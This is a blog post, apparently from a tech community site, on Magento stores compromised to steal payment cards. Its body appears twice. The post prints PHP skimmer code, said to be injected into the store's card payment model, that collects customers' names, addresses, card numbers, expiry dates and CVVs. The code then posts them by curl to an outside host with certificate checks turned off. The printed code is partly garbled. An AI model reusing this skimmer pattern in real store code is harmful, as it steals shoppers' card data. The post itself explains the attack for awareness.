MyPage is a personalized page based on your interests.The page is customized to help you to find content that matters you the most.


I'm not curious

What is the Impact of Cyber Hack on Your Magento Store?

Published on 21 July 15
578
0
1
What is the Impact of Cyber Hack on Your Magento Store? - Image 1

By now, you do understand the impact of cyber hack on your website. But, are you aware of how it can convert into a reported money loss? You can easily recognize sites that have become vulnerable to bugs. You would be aware of sites with fake credentials, which you need to avoid. But, what about sites that seems good, but is actually compromised? You will not get an idea on that from the outside.

Identifying Fraudulent Practices
Many times, you come across e-commerce websites wherein users face fraudulent charges on their credit/debit card, after using it on these websites to purchase something. One credit/debit card transaction on these websites can result in unauthorized card transactions. Let's understand why this happens.

Go to app/code/core/Mage/Payment/Model/Method/Cc.php file, and you will see a malicious code here which is responsible for the unauthorized transactions.

$object= new Mage_Checkout_Block_Onepage_Billing;
$address1= $object -> getQuote() -> getBillingAddress();
$data1 = $Address 1 ->getFirstname();
$data2 = $Address 1 ->getLastname();
$data3 = $Address 1 ->getStreet(1);
$data4 = $Address 1 ->get Street(2);
$data5 = $Address 1 ->getCity();
$data6 = $Address 1 ->getRegion();
$data7 = $Address 1 ->getPostCode();
$data8 = $Address 1 ->getCountry();
$data9 = $Address 1 ->getTelephone();
$data10 = $Address 1 ->getCcNumber();
$expyear = substr ($info->getCcExpYear(), -2);
$expmonth = $info->getCCExpMonth();

if (strlen ($expmonth) == 1) {
$expmonth = '0' .$expmonth;
);

$datal11 = $expmonth;
$datal12 = $expyear;
$datal13 = $info->getCcCid();
$datal14 = ' ';
$data15 = "compromised-site.com";
$data16 = Mage:: getSingleton ('checkout/session')-> getQuote() -> getBillingAddress()
$data17 = ' '; //country
$post77 = "firstname=" .($data1). "&lastname=" .($data2). "&street1=" .($data3) . "&street2
$url = http://soulmagic.biz.fozzyhost.com/add;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url); // set url to post to
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // allow redirects
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return into a variable
curl_setopt($ch, CURLOPT_TIMEOUT, 60); // setimes out after 4s
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post77);
$result = curl_exec($ch); //run the whole process
curl_close($ch);

Generally, within the prepareSave() function hackers tend to add 50 extra lines of code that then sends all the payment related information to a third party site. This information is extracted when the details are in the unencrypted form for a few seconds. Having a security badge or HTTPs sign on your website cannot guarantee prevention from hacking. So, what steps do the users of ecommerce websites and owners of ecommerce websites need to take?

Care Shoppers Should Take
You should always consider websites that send you to a payment organization, or gateway to complete transactions. Also check, before using the ecommerce website, if they have had some security compromises in the past or not. Always use credit cards that call for high levels of authentication, other than CVV, while shopping online.








What is the Impact of Cyber Hack on Your Magento Store? - Image 1

By now, you do understand the impact of cyber hack on your website. But, are you aware of how it can convert into a reported money loss? You can easily recognize sites that have become vulnerable to bugs. You would be aware of sites with fake credentials, which you need to avoid. But, what about sites that seems good, but is actually compromised? You will not get an idea on that from the outside.

Identifying Fraudulent Practices

Many times, you come across e-commerce websites wherein users face fraudulent charges on their credit/debit card, after using it on these websites to purchase something. One credit/debit card transaction on these websites can result in unauthorized card transactions. Let's understand why this happens.

Go to app/code/core/Mage/Payment/Model/Method/Cc.php file, and you will see a malicious code here which is responsible for the unauthorized transactions.

$object= new Mage_Checkout_Block_Onepage_Billing;

$address1= $object -> getQuote() -> getBillingAddress();

$data1 = $Address 1 ->getFirstname();

$data2 = $Address 1 ->getLastname();

$data3 = $Address 1 ->getStreet(1);

$data4 = $Address 1 ->get Street(2);

$data5 = $Address 1 ->getCity();

$data6 = $Address 1 ->getRegion();

$data7 = $Address 1 ->getPostCode();

$data8 = $Address 1 ->getCountry();

$data9 = $Address 1 ->getTelephone();

$data10 = $Address 1 ->getCcNumber();

$expyear = substr ($info->getCcExpYear(), -2);

$expmonth = $info->getCCExpMonth();

if (strlen ($expmonth) == 1) {

$expmonth = '0' .$expmonth;

);

$datal11 = $expmonth;

$datal12 = $expyear;

$datal13 = $info->getCcCid();

$datal14 = ' ';

$data15 = "compromised-site.com";

$data16 = Mage:: getSingleton ('checkout/session')-> getQuote() -> getBillingAddress()

$data17 = ' '; //country

$post77 = "firstname=" .($data1). "&lastname=" .($data2). "&street1=" .($data3) . "&street2

$url = http://soulmagic.biz.fozzyhost.com/add;

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url); // set url to post to

curl_setopt($ch, CURLOPT_REFERER, $url);

curl_setopt($ch, CURLOPT_HEADER, 1);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // allow redirects

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return into a variable

curl_setopt($ch, CURLOPT_TIMEOUT, 60); // setimes out after 4s

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post77);

$result = curl_exec($ch); //run the whole process

curl_close($ch);

Generally, within the prepareSave() function hackers tend to add 50 extra lines of code that then sends all the payment related information to a third party site. This information is extracted when the details are in the unencrypted form for a few seconds. Having a security badge or HTTPs sign on your website cannot guarantee prevention from hacking. So, what steps do the users of ecommerce websites and owners of ecommerce websites need to take?

Care Shoppers Should Take

You should always consider websites that send you to a payment organization, or gateway to complete transactions. Also check, before using the ecommerce website, if they have had some security compromises in the past or not. Always use credit cards that call for high levels of authentication, other than CVV, while shopping online.

This blog is listed under E-Commerce Community

Related Posts:
Post a Comment

Please notify me the replies via email.

Important:
  • We hope the conversations that take place on MyTechLogy.com will be constructive and thought-provoking.
  • To ensure the quality of the discussion, our moderators may review/edit the comments for clarity and relevance.
  • Comments that are promotional, mean-spirited, or off-topic may be deleted per the moderators' judgment.
You may also be interested in
Awards & Accolades for MyTechLogy
Winner of
REDHERRING
Top 100 Asia
Finalist at SiTF Awards 2014 under the category Best Social & Community Product
Finalist at HR Vendor of the Year 2015 Awards under the category Best Learning Management System
Finalist at HR Vendor of the Year 2015 Awards under the category Best Talent Management Software
Hidden Image Url

Back to Top